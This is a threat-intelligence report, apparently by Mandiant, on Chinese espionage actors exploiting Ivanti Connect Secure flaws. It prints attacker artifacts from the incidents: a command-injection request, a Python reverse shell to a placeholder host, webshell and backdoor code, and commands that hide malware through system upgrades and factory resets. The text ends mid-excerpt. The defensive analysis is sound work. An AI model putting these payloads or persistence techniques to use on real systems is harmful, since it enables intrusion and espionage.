<p>Ivanti customers are urged to take immediate action to ensure protection if they haven't done so already. A new version of the external Integrity Checking Tool (ICT), which helps detect these persistence attempts, is now available. See Ivanti's <a href="https://forums.ivanti.com/s/article/KB-CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US" rel="noopener" target="_blank"><u>security advisory</u></a> and refer to our updated <a href="https://services.google.com/fh/files/misc/ivanti-connect-secure-remediation-hardening.pdf" rel="noopener" target="_blank"><u>remediation and hardening guide</u></a>, which includes the latest recommendations.</p>
<p>The exploitation of the Ivanti zero-days has likely impacted numerous appliances. While much of the activity has been automated, there has been a smaller subset of follow-on activity providing further insights on attacker tactics, techniques, and procedures (TTPs). Mandiant assesses additional actors will likely begin to leverage these vulnerabilities to enable their operations.</p>
<p>To date, Ivanti has disclosed the following five vulnerabilities affecting Ivanti Connect Secure and other products.<br><br></p>
<div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Date</strong></p>
</td>
<td>
<p><strong>CVE</strong></p>
</td>
<td>
<p><strong>CVSS</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Jan. 10, 2024</span></p>
</td>
<td>
<p><span>CVE-2023-46805</span></p>
</td>
<td>
<p><span>8.2</span></p>
</td>
<td>
<p><span>Authentication bypass vulnerability in web component</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Jan. 10, 2024</span></p>
</td>
<td>
<p><span>CVE-2024-21887</span></p>
</td>
<td>
<p><span>9.1</span></p>
</td>
<td>
<p><span>Command injection vulnerability in web component</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Jan. 31, 2024</span></p>
</td>
<td>
<p><span>CVE-2024-21888</span></p>
</td>
<td>
<p><span>8.8</span></p>
</td>
<td>
<p><span>Privilege escalation vulnerability in web component</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Jan. 31, 2024</span></p>
</td>
<td>
<p><span>CVE-2024-21893</span></p>
</td>
<td>
<p><span>8.2</span></p>
</td>
<td>
<p><span>SSRF vulnerability in the SAML component</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Feb. 08, 2024</span></p>
</td>
<td>
<p><span>CVE-2024-22024</span></p>
</td>
<td>
<p><span>8.3</span></p>
</td>
<td>
<p><span>XXE vulnerability in the SAML component</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><em>Table 1: Ivanti vulnerability disclosures Jan. 10, 2024 to Feb. 8, 2024</em></span></p>
<p>In our <a href="https://cloud.google.com/blog/topics/threat-intelligence/investigating-ivanti-zero-day-exploitation" rel="noopener" target="_blank"><u>previous blog post</u></a>, we described a mitigation bypass that was used to drop a newly identified BUSHWALK webshell. The mitigation bypass is now tracked as <a href="https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US" rel="noopener" target="_blank"><u>CVE-2024-21893</u></a>. It is a server-side request forgery (SSRF) vulnerability in the SAML component of Ivanti Connect Secure (CS), Policy Secure (PS), and Neurons for Zero Trust Access (NZTA) appliances that was addressed in the patches and mitigations released on Jan. 31, 2024. </p>
<p>Since that post, an additional vulnerability was reported on Feb. 8, 2024, by Ivanti, <a href="https://forums.ivanti.com/s/article/CVE-2024-22024-XXE-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US" rel="noopener" target="_blank"><u>CVE-2024-22024</u></a>, related to an XML External Entity (XXE) vulnerability in the SAML component that allows unauthenticated attackers to gain access to restricted resources on patched appliances.</p>
<h2>Attribution</h2>
<h3>UNC5325</h3>
<p>UNC5325 is a suspected Chinese cyber espionage operator that exploited CVE-2024-21893 to compromise Ivanti Connect Secure appliances. UNC5325 leveraged code from open-source projects, installed custom malware, and modified the appliance's settings in order to evade detection and attempt to maintain persistence. UNC5325 has been observed deploying LITTLELAMB.WOOLTEA, PITSTOP, PITDOG, PITJET, and PITHOOK. Mandiant identified TTPs and malware code overlaps in LITTLELAMB.WOOLTEA and PITHOOK with malware leveraged by UNC3886. Mandiant assesses with moderate confidence that UNC5325 is associated with UNC3886.</p>
<h3>UNC3886</h3>
<p>UNC3886 is a suspected Chinese espionage operator that has compromised network devices at targets where they <a href="https://cloud.google.com/blog/topics/threat-intelligence/vmware-esxi-zero-day-bypass" rel="noopener" target="_blank"><u>leveraged novel techniques</u></a> against virtualization technologies. They installed custom malware built for such technologies by leveraging code from open-source projects as well as exploiting zero-day vulnerabilities. UNC3886 has primarily targeted the defense industrial base, technology, and telecommunication organizations located in the US and APJ regions. We are continuing to gather evidence and identify overlaps between UNC3886 and other suspected Chinese espionage groups, including targeting and the use of distinct tactics, techniques, and procedures (TTPs). </p>
<h2>New TTPs and Malware</h2>
<p>Since our last <a href="https://cloud.google.com/blog/topics/threat-intelligence/investigating-ivanti-zero-day-exploitation" rel="noopener" target="_blank"><u>blog post</u></a> on Ivanti exploitation, Mandiant has identified UNC5325 exploiting CVE-2024-21893 (SSRF) to deploy additional malware and maintain persistent access to compromised appliances. In addition, we have observed new TTPs that attempted to enable the custom backdoors to persist across factory resets, system upgrades, and patches. The limited attempts observed to maintain persistence have not been successful to date.</p>
<h3>Exploitation of CVE-2024-21893 (SSRF)</h3>
<p>Mandiant identified active exploitation of CVE-2024-21893 by UNC5325 as early as Jan. 19, 2024, targeting a limited number of Ivanti Connect Secure appliances.</p>
<p>On Jan. 31, 2024, Ivanti disclosed CVE-2024-21893, a server-side request forgery (SSRF) vulnerability in the SAML component of Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti Neurons for ZTA. To date, we have only identified successful exploitation against Ivanti Connect Secure appliances.</p>
<p>In the same Jan. 31, 2024, announcement, Ivanti released a new XML mitigation to prevent exploitation of all four (4) disclosed CVEs at the time of the announcement. This included:</p>
<ul>
<li>CVE-2023-46805 (authentication bypass)</li>
<li>CVE-2024-21887 (command injection)</li>
<li>CVE-2024-21888 (privilege escalation)</li>
<li>CVE-2024-21893 (server-side request forgery)</li>
</ul>
<p>CVE-2024-21893 allowed for an unauthenticated attacker to exploit an appliance by chaining the previously disclosed command injection vulnerability as described in CVE-2024-21887. This includes appliances with the XML mitigation released on Jan. 10, 2024.</p>
<h5>Chaining CVE-2024-21893 (SSRF) and CVE-2024-21887 (Command Injection)</h5>
<p>Shortly after the disclosure of CVE-2024-21893, Mandiant observed threat actors chaining the SSRF vulnerability with the command injection vulnerabilities described in CVE-2024-21887 to exploit vulnerable devices.</p>
<p>In some instances, publicly available services, such as <a href="https://github.com/projectdiscovery/interactsh" rel="noopener" target="_blank"><u>Interactsh</u></a>, were used to validate whether the target was vulnerable to CVE-2024-21893.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>GET /api/v1/license/keys-status/;python -c 'import 
socket;socket.gethostbyname("&lt;randomstring&gt;.oast.live")'</code></pre>
<p><span><em><span>Figure 1: CVE-2024-21893 vulnerability validation</span></em></span></p></div>
<div class="block-paragraph_advanced"><p>Shortly after a vulnerable target was identified, the threat actor executed follow-on commands to perform reconnaissance and, in some cases, establish a reverse shell.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>GET /api/v1/license/keys-status/;python -c 'import 
socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
;s.connect(("&lt;remote_ip&gt;",&lt;port&gt;));subprocess.call(["/bin/sh","-i"]</code></pre>
<p><span><em><span>Figure 2: Python reverse TCP shell</span></em></span></p></div>
<div class="block-paragraph_advanced"><h4>Identifying Exploitation Attempts</h4>
<p>Exploitation of the SSRF vulnerability in the SAML component generates up to two (2) log events and some host-based artifacts on an affected appliance.</p>
<p>If the Ivanti Connect Secure appliance is configured to log unauthenticated requests, event ID <code>AUT31556</code> is generated when an unauthenticated attacker requests the vulnerable SAML endpoint, <code>/dana-ws/saml.ws</code>. The event includes the source IP address of the unauthenticated request.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>AUT31556: Unauthenticated request url /dana-ws/saml.ws came from IP 
&lt;REDACTED&gt;.</code></pre>
<p><span><em><span>Figure 3: Event log entry showing unauthenticated request to vulnerable SAML endpoint</span></em></span></p></div>
<div class="block-paragraph_advanced"><p>In addition, the server fails to gracefully handle the maliciously crafted SAML payload to exploit CVE-2024-21893. The appliance generates an error event log entry with event ID <code>ERR31903</code> when the <code>saml-server</code> process crashes, which is potentially indicative of an exploitation attempt.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>ERR31093: Program saml-server recently failed.</code></pre>
<p><span><em><span>Figure 4: Event log entry of process crash</span></em></span></p></div>
<div class="block-paragraph_advanced"><p>We recommend analyzing both allocated and unallocated disk space on the forensic image for the presence of the log events as we have observed the threat actor deleting the relevant log files.</p>
<p>Lastly, the crash of the <code>saml-server</code> process generates core dumps located in <code>/data/var/cores/</code>. If the core dumps are available, it is possible to extract the crafted SAML message, HTTP headers of the request, and the source IP address. We have observed the threat actor deleting the contents of the <code>cores</code> directory, but we have successfully recovered relevant fragments of the core dumps through file carving.</p>
<h3>BUSHWALK Variant</h3>
<p>In <a href="https://cloud.google.com/blog/topics/threat-intelligence/investigating-ivanti-zero-day-exploitation" rel="noopener" target="_blank"><u>Cutting Edge, Part 2</u></a>, we introduced a new web shell tracked as BUSHWALK associated with the exploitation of CVE-2024-21893 and CVE-2024-21887. Similar to other web shells observed in this campaign, BUSHWALK is written in Perl and embedded into a legitimate Ivanti Connect Secure component, <code>querymanifest.cgi</code>.</p>
<p>Mandiant identified a new variant of BUSHWALK through our incident response engagements. This new variant of BUSHWALK was identified on a compromised appliance less than twelve (12) hours following Ivanti's disclosure of CVE-2024-21893 on Jan. 31, 2024. The variant is similar to the BUSHWALK sample described in our previous blog post, but with a new function named <code>checkVerison</code> that enables arbitrary file read from the appliance. The function is executed when the decrypted payload contains the string check. Figure 5 shows the relevant <code>checkVerison</code> function.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>sub checkVerison
{
    my ($file, $key) = @_;
    my $contents = "";
    my $buffer;
    my $bytesread = 0;
    my $totalbytesread = 0;
    local *FILE;
    CORE::open(*FILE, $file);
    while($bytesread = sysread(FILE, $buffer, 1024)) {
        $contents .= $buffer;
        $totalbytesread += $bytesread;
    }
    if ($totalbytesread == 0) {
        print "Unable to read file with path: $file";
        print CGI::header(-type=&gt;"text/html", -status=&gt; '404 Not Found');
        exit;
    }
    print CGI::header();
    $contents = RC4($key, $contents);
    $contents = MIME::Base64::encode_base64($contents);
    print $contents;
    close *FILE;
}</code></pre>
<p><span><em><span>Figure 5: BUSHWALK's </span><code>checkVerison</code><span> function for file reading</span></em></span></p></div>
<div class="block-paragraph_advanced"><p>Note that we have observed the same RC4 key for decrypting issued commands across the two BUSHWALK variants and all identified samples.</p>
<p>In addition, we have seen the threat actor demonstrate a nuanced understanding of the appliance and their ability to subvert detection throughout this campaign. We identified a technique allowing BUSHWALK to remain in an undetected dormant state by creatively modifying a Perl module and LotL technique by using built-in system utilities unique to Ivanti products.</p>
<p>To accomplish this, the threat actor first modifies a Perl module, <code>DSUserAgentCap.pm</code>, that evaluates incoming user agents. The modification enables the threat actor to either activate or deactivate BUSHWALK depending on the incoming HTTP request's user agent.</p>
<p>Figure 6 provides the excerpt of the modification in <code>DSUserAgentCap.pm</code>. Note the difference in spelling between <code>App1eWebKit</code> and <code>AppIeWebKit</code> in the two user agent strings.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>sub getUserAgentType {
   my ($user_agent) = @_;
   if ($user_agent eq "Mozilla/5.0 (Windows NT 10.0; Win64; x64) 
App1eWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"){
        system("mount -o remount,rw /");
        system("/home/bin/configdecrypt /data/runtime
/cockpit/diskAnalysis /data/runtime/cockpit/diskAnalysis.bak");
        system("cp /home/webserver/htdocs/dana-na/jam/querymanifest.cgi 
/home/webserver/htdocs/dana-na/jam/querymanifest.cgi.bak");
        system("echo '/home/webserver/htdocs/dana-na/jam
/querymanifest.cgi' &gt;&gt; /home/etc/manifest/exclusion_list");
        system("mv /data/runtime/cockpit/diskAnalysis.bak 
/home/webserver/htdocs/dana-na/jam/querymanifest.cgi");
        system("chmod 755 /home/webserver/htdocs/dana-na/jam
/querymanifest.cgi");
        system("mkdir /debug");
        system("/home/bin/restartServer.pl Restart");
        exit(0);
   }
   elsif ($user_agent eq "Mozilla/5.0 (Windows NT 10.0; Win64; x64) 
AppIeWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"){
        system("mv /home/webserver/htdocs/dana-na/jam
/querymanifest.cgi.bak /home/webserver/htdocs/dana-na/jam/querymanifest.cgi");
        system("touch -r /home/webserver/htdocs/dana-na/auth
/setcookie.cgi /home/webserver/htdocs/dana-na/jam/querymanifest.cgi");
        system("/bin/sed -i '\$d' /home/etc/manifest/exclusion_list");
        system("rm -rf /debug");
        system("mount -o remount,ro /");
        exit(0);
   }
   else{
        my $type  = DSClientTypes::getUserAgentType($user_agent);
        return $type;
   }</code></pre>
<p><span><em><span>Figure 6: Excerpt of DSUserAgentCap.pm</span></em></span></p></div>
<div class="block-paragraph_advanced"><p>An encrypted version of BUSHWALK is placed in a directory excluded by the integrity checker tool (ICT) in <code>/data/runtime/cockpit/diskAnalysis</code>. </p>
<p>The activation routine (the <code>if</code> block) uses a built-in utility on the appliance located in <code>/home/bin/configdecrypt</code> used for decrypting the system's configuration. The routine executes the <code>configdecrypt</code> utility to decrypt <code>diskAnalysis</code> containing the BUSHWALK web shell. It then makes a backup of the original <code>querymanifest.cgi</code> file, adds it to the <code>exclusion_list</code>, moves BUSHWALK to the web server directory, and restarts the web server to load the web shell.</p>
<p>The deactivation routine (the <code>elseif</code> block) restores the original <code>querymanifest.cgi</code> file, timestomps it using <code>touch</code> to hide their activity, removes the path of BUSHWALK from <code>exclusion_list</code>, and restarts the web server. However, the encrypted version of BUSHWALK remains dormant in a dynamic directory and therefore is not scanned by the integrity checker tool. It continues to quietly persist in <code>/data/runtime/cockpit/diskAnalysis</code> until the threat actor activates it again.</p>
<p>The internal ICT is configured to run in two-hour intervals by default and is meant to be run in conjunction with continuous monitoring. Any malicious file system modifications made and reverted between the two-hour scan intervals would remain undetected by the ICT. When the activation and deactivation routines are performed tactfully in quick succession, it can minimize the risk of ICT detection by timing the activation routine to coincide precisely with the intended use of the BUSHWALK webshell.</p>
<h3>SparkGateway Plugin Abuse</h3>
<p>In a limited number of instances following exploitation of CVE-2024-21893, we identified the use of SparkGateway plugins to persistently inject shared objects and deploy backdoors. SparkGateway is a legitimate component of the Ivanti Connect Secure appliance that enables remote access protocols over a browser, such as RDP or SSH. The functionality of SparkGateway can be extended through plugins.</p>
<h4>PITFUEL Plugin</h4>
<p>Mandiant identified a SparkGateway plugin named <code>plugin.jar</code> (PITFUEL) that loads the shared object <code>libchilkat.so</code> (LITTLELAMB.WOOLTEA) through the Java Native Interface (JNI) by calling <code>System.load()</code>. The shared object persistently deploys backdoors and contains capabilities to persist across system upgrade events, patches, and factory resets.</p>
<p>Figure 7 shows the relevant excerpt of the <code>PluginManager</code> class in PITFUEL.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>public class PluginManager {
  static {
    try {
      System.load("/home/runtime/SparkGateway/libchilkat.so");
    } catch (Exception exception) {}
    try {
      Config config = Config.getInstance();
      config.remove("plugin");
      config.remove("pluginFile");
    } catch (Exception exception) {}
    try {
      Logger logger = Logger.getLogger(Config.class.getName());
      SparkGatewayFilter sparkGatewayFilter = new SparkGatewayFilter();
      logger.setFilter(sparkGatewayFilter);
    } catch (Exception exception) {}
  }
  
  static class SparkGatewayFilter implements Filter {
    public boolean isLoggable(LogRecord param1LogRecord) {
      return (param1LogRecord.getLevel().intValue() != Level.
SEVERE.intValue());
    }
  }
}
</code></pre>
<p><span><em><span>Figure 7: </span><code>PluginManager</code><span> class of SparkGateway plugin (PITFUEL)</span></em></span></p></div>
<div class="block-paragraph_advanced"><p>Upon execution, <code>libchilkat.so</code> (LITTLELAMB.WOOLTEA) performs a number of initialization routines to ensure that it persistently runs in the background on the compromised system. It accomplishes this by daemonizing itself, attempting to trap <code>SIGPIPE</code>, <code>SIGKILL</code>, and <code>SIGTERM</code> signals, and adjusting the out of memory (OOM) adjustment value (<code>oom_adj</code>) to <code>-17</code> to keep the process running even when the system is out of memory.</p>
<h4>Persistence Across System Upgrades and Patches</h4>
<p>Upon first execution, LITTLELAMB.WOOLTEA executes the <code>first_run()</code> function. It calls the <code>edit_current_data_backup()</code> function that appends its malicious components to an archive, <code>/data/pkg/data-backup.tgz</code>. Figure 8 provides the equivalent command sequence.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>gzip -d /data/pkg/data-backup.tgz &gt; /dev/null 2&gt;&amp;1

tar -rf /data/pkg/data-backup.tar /data/runtime/SparkGateway/plugin.jar 
/data/runtime/SparkGateway/libchilkat.so 
/data/runtime/SparkGateway/gateway.conf &gt; /dev/null 2&gt;&amp;1

gzip /data/pkg/data-backup.tar &gt; /dev/null 2&gt;&amp;1

mv /data/pkg/data-backup.tar.gz /data/pkg/data-backup.tgz &gt; /dev/null 2&gt;&amp;1</code></pre>
<p><span><em><span>Figure 8: Command sequence executed by </span><code>edit_current_data_backup()</code></em></span></p></div>
<div class="block-paragraph_advanced"><p>During a system upgrade or when applying a patch, <code>data-backup.tgz</code> contains a backup of the <code>data</code> directory that is restored after the upgrade event. In addition, the function timestomps <code>data-backup.tgz</code> by calling <code>utimensat</code>. This modification would ensure its malicious components (<code>plugin.jar</code>, <code>libchilkat.so</code>, and <code>gateway.conf</code>) persist across system upgrades and patches.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>(cd / ; tar -zxBf /data/pkg/data-backup.tgz &gt;/dev/null 2&gt;&amp;1)</code></pre>
<p><span><em><span>Figure 9: Decompression of </span><code>data-backup.tgz</code><span> during system upgrade events</span></em></span></p></div>
<div class="block-paragraph_advanced"><p>In addition, the malware contains a function named <code>upgrade_monitor()</code> that supports persistence across system upgrade and patch events. We assess that this acts as a secondary persistence method by making a modification at the precise moment of a system upgrade or patch event.</p>
<p>It monitors for system upgrade events by continually checking the filesystem for the existence of <code>/tmp/data/root/dev</code>. This path is used to support a system upgrade process. In other words, the presence of the path indicates to the malware the existence of a system upgrade event.</p>
<p>If the path exists, it intervenes the system upgrade process by appending itself and its constituent components into the archive <code>/tmp/data/root/samba_upgrade.tar</code>. During a system upgrade process, the appliance decompresses <code>samba_upgrade.tar</code> for data migration purposes. Figure 10 provides the command executed by <code>upgrade_monitor()</code> when it detects the existence of <code>/tmp/data/root/dev</code>.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>tar -rf /tmp/data/root/samba_upgrade.tar 
/home/runtime/SparkGateway/plugin.jar 
/home/runtime/SparkGateway/libchilkat.so 
/home/runtime/SparkGateway/gateway.conf  &gt; /dev/null 2&gt;&amp;1</code></pre>
<p><span><em><span>Figure 10: Shell command executed by </span><code>upgrade_monitor()</code></em></span></p></div>
<div class="block-paragraph_advanced"><p>During the system upgrade or patch process, the <code>post-install</code> bash script executes the following to decompress <code>samba_upgrade.tar</code>, copying the malicious components (<code>libchilkat.so</code>, <code>plugin.jar</code>, and <code>gateway.conf</code>) to the new active partition. Figure 11 provides the relevant command sequence from <code>post-install</code>.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>tar -tf $upgrade_partition samba_upgrade.tar &gt; /dev/null 2&gt;&amp;1
if [ $? -eq 0 ]; then
    (cd /; tar -xf $upgrade_partition samba_upgrade.tar &gt;/dev/null)
fi</code></pre>
<p><span><em><span> Figure 11: Decompression of </span><code>samba_upgrade.tar</code><span> by </span><code>post-install</code><span> script</span></em></span></p></div>
<div class="block-paragraph_advanced"><h4>Attempted Persistence Across Factory Resets</h4>
<p>Next, LITTLELAMB.WOOLTEA executes <code>first_run()</code>, which reads and checks the hardware of the appliance by reading the first four (4) bytes of the motherboard serial number at <code>/proc/ive/mbserialnumber</code> and adjusts its behavior to mount the root partition of the factory reset image for further modification.</p>
<p>If the four (4) bytes match the strings <code>0331</code>, <code>0332</code>, <code>0340</code>, <code>0481</code>, or <code>0482</code>, the malware executes the following command to mount <code>/dev/md5</code> (factory reset root partition) on <code>/dev/loop5</code>.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>/bin/losetup /dev/loop5 /dev/md5 &gt; /dev/null 2&gt;&amp;1</code></pre>
<p><span><em><span>Figure 12: Command to set up loop device for block device </span><code>/dev/md5</code></em></span></p></div>
<div class="block-paragraph_advanced"><p>Each of the four-byte strings corresponds to a physical Pulse Secure Appliance (PSA) or a Ivanti Secure Appliance (ISA) product.<br><br></p>
<div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Machine ID</strong></p>
</td>
<td>
<p><strong>Appliance Model Number</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>0331</span></p>
</td>
<td>
<p><span>PSA 7000F</span></p>
</td>
</tr>
<tr>
<td>
<p><span>0332</span></p>
</td>
<td>
<p><span>PSA 7000C</span></p>
</td>
</tr>
<tr>
<td>
<p><span>0340</span></p>
</td>
<td>
<p><span>PSA 10000</span></p>
</td>
</tr>
<tr>
<td>
<p><span>0481</span></p>
</td>
<td>
<p><span>ISA 8000F</span></p>
</td>
</tr>
<tr>
<td>
<p><span>0482</span></p>
</td>
<td>
<p><span>ISA 8000C</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><em><span>Table 2: Machine ID to physical appliance model number</span></em></span></p>
<p>Otherwise, the malware executes the following command to mount <code>/dev/xda5</code> (factory reset root partition) on <code>/dev/loop5</code> if the four (4) bytes do not match any of the machine ID strings or if it fails to read <code>/proc/ive/mbserialnumber</code>.</p>
</div></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>/bin/losetup /dev/loop5 /dev/xda5 &gt; /dev/null 2&gt;&amp;1</code></pre>
<p><span><em><span>Figure 13: Command to set up loop device for block device </span><code>/dev/xda5</code></em></span></p></div>
<div class="block-paragraph_advanced"><p>Next, LITTLELAMB.WOOLTEA mounts the newly created loop device (<code>/dev/loop5</code>) to <code>/tmp/tmpmnt</code> to modify the factory reset root partition. Figure 14 provides the equivalent command sequence.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>mkdir -m 777 /tmp/tmpmnt
mount /dev/loop5 /tmp/tmpmnt -t ext2</code></pre>
<p><span><em><span>Figure 14: Command to mount loop device </span><code>/dev/loop5</code></em></span></p></div>
<div class="block-paragraph_advanced"><p>It's important to note that <code>/bin/losetup</code> uses an embedded encryption key within the running version's kernel used to decrypt the running version's partition. This encryption key is hardcoded at the time of build compilation and is unique for each appliance version.</p>
<p>However, the factory reset partition maintains its own independent encryption key embedded in the factory kernel. If the current running version and the factory reset deployment versions differ (i.e., the appliance or VM has been updated at least once), then <code>/bin/losetup</code> will fail to decrypt the factory reset partition due to the encryption key mismatch and thus the malware will not persist after factory reset.</p>
<p>Note that Mandiant and Ivanti conducted forensic analysis on an affected appliance after factory reset to confirm no evidence of malware persistence. Because the appliance had undergone at least one update since its initial deployment, the malware failed to persist through the factory reset as the encryption key of the factory reset kernel and the running version kernel were different.</p>
<p>If <code>losetup</code> had succeeded in decrypting the factory reset image, the malware would continue its persistence workflow. To modify the factory reset process, it calls the <code>edit_factory_reset()</code> function that renames the <code>tar</code> binary to <code>tra</code> in the mounted factory reset partition.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>mv /tmp/tmpmnt/bin/tar /tmp/tmpmnt/bin/tra</code></pre>
<p><span><em><span>Figure 15: Command to rename </span><code>tar</code><span> binary</span></em></span></p></div>
<div class="block-paragraph_advanced"><p>Then, the malware writes a trojanized version of the <code>tar</code> binary to <code>/tmp/tmpmnt/bin/tar</code>, makes the <code>tar</code> binary executable, and preemptively appends its malicious components (using the legitimate <code>tar</code> utility) to the archive <code>/tmp/tmpmnt/bin/samba_upgrade.tar</code> inside the factory reset partition.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>tar -rf /tmp/tmpmnt/bin/samba_upgrade.tar 
/home/runtime/SparkGateway/plugin.jar 
/home/runtime/SparkGateway/libchilkat.so 
/home/runtime/SparkGateway/gateway.conf  &gt; /dev/null 2&gt;&amp;1</code></pre>
<p><span><em><span>Figure 16: Command to archive components to </span><code>samba_upgrade.tar</code></em></span></p></div>
<div class="block-paragraph_advanced"><p>The trojanized <code>tar</code> binary checks for a set of specific conditions to copy the malicious <code>/bin/samba_upgrade.tar</code> to <code>/tmp/samba_upgrade.tar</code> during the factory reset process. </p>
<ul>
<li>There are four arguments provided (<code>argc</code> is equal to 4)</li>
<li>The second argument, <code>argv[1]</code>, is <code>-cf</code> </li>
<li>The fourth argument, <code>argv[3]</code>, is <code>no-data</code></li>
</ul>
<p>If any of these conditions are not met, the trojanized <code>tar</code> binary executes the legitimate <code>tar</code> (<code>/bin/tra</code>) utility backed up in Figure 15.</p>
<p>The conditions are satisfied by a component of the factory reset procedure responsible for resetting the configuration (<code>dsconfigreset</code>). The utility creates an empty file in <code>/tmp/no-data</code> and archives it using <code>/bin/tar -cf</code>. Figure 17 provides the relevant command sequence.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>echo "" &gt; /tmp/no-data
(cd /tmp; /bin/tar -cf $tmp_part no-data)</code></pre>
<p><span><em><span>Figure 17: Command executed during factory reset by </span><code>dsconfigreset</code></em></span></p></div>
<div class="block-paragraph_advanced"><p>When <code>dsconfigreset</code> executes <code>/bin/tar -cf $tmp_part no-data</code>, the trojanized <code>tar</code> copies the contents of <code>/bin/samba_upgrade.tar</code> containing its malicious components to <code>/tmp/samba_upgrade.tar</code> in the factory reset root partition (mounted on <code>/tmp/tmpmnt</code>).</p>
<p>Next, similar to the previously described system upgrade persistence flow, the appliance executes the <code>post-install</code> bash script during the installation process of the new system. This script decompresses the <code>samba_upgrade.tar</code> archive in the factory reset partition, copying the malicious components (<code>libchilkat.so</code>, <code>plugin.jar</code>, and <code>gateway.conf</code>) to the new active partition created after the factory reset.</p>
<h5>Hooking the Web Server Process</h5>
<p>The <code>httpd_monitor()</code> function ensures the persistent injection of another shared object, <code>libaprhelper.so</code> (PITSOCK), into the <code>web</code> process using a built-in injection function named <code>inject_loop()</code>. </p>
<p>PITSOCK hooks the functions <code>accept</code> and <code>setsockopt</code> of the <code>web</code> process by modifying its procedure linkage table (PLT). This enables backdoor communication via the Unix socket <code>/tmp/clientsDownload.sock</code> when it receives a specific 48-byte magic byte sequence in the incoming buffer.</p>
<h5>Creating the Malicious SparkGateway Plugin</h5>
<p>Lastly, <code>libchilkat.so</code> calls <code>persist()</code>, which modifies the SparkGateway configuration file. Figure 18 shows an excerpt from the modified SparkGateway configuration file to support and load the plugin.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>plugin = com.toremote.gateway.plugin.PluginManager
pluginFile = /home/runtime/SparkGateway/plugin.jar</code></pre>
<p><span><em><span>Figure 18: Excerpt of SparkGateway configuration file</span></em></span></p></div>
<div class="block-paragraph_advanced"><h5>Backdoor Features</h5>
<p><code>libchilkat.so</code> also serves as a stand-alone backdoor that supports expected features such as command execution, file management, shell creation, SOCKS proxy, and network traffic tunneling. It communicates over SSL using the private key located on the Ivanti Connect Secure web server (<code>/home/webserver/conf/ssl.key/secure.key</code>) and communicates using the socket <code>/tmp/clientsDownload.sock</code>.</p>
<h4>PITDOG Plugin</h4>
<p>Mandiant identified a second malicious SparkGateway plugin named <code>security.jar</code> (PITDOG) that uses <a href="https://github.com/kubo/injector" rel="noopener" target="_blank"><u>Kubo Injector</u></a> (<code>memorysCounter</code>) to inject a shared object, <code>mem.rd</code> (PITHOOK), into the <code>web</code> process memory, and persistently executes a backdoor, <code>dsAgent</code> (PITSTOP). Figure 19 shows the relevant excerpts from <code>security.jar</code>.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>public class SparkPlugin implements ManagerInterface {
  public static void watchdog() {
    try {
      Thread.sleep(300000L);
      ProcessBuilder processBuilder = new ProcessBuilder(new String[0]);
      Process process = Runtime.getRuntime().exec(new String[] { "/bin/sh", 
"-c", "ps aux|grep '/home/bin/web'|grep -v grep | 
awk '{if (NR!=1) {print $2}}'" });
      BufferedReader reader = new BufferedReader(new InputStreamReader
(process.getInputStream()));
      String line;
      while ((line = reader.readLine()) != null) {
        int procnum = Integer.parseInt(line);
        String catprocstr = String.format("cat /proc/%d/maps | grep mem.rd", 
new Object[] { Integer.valueOf(procnum) });
        Process processinjectres = Runtime.getRuntime().exec(new String[] 
{ "/bin/sh", "-c", catprocstr });
        BufferedReader processinjectreader = new BufferedReader(new 
InputStreamReader(processinjectres.getInputStream()));
        if ((line = processinjectreader.readLine()) == null) {
          String processinjectstr = String.format("/data/runtime/cockpit
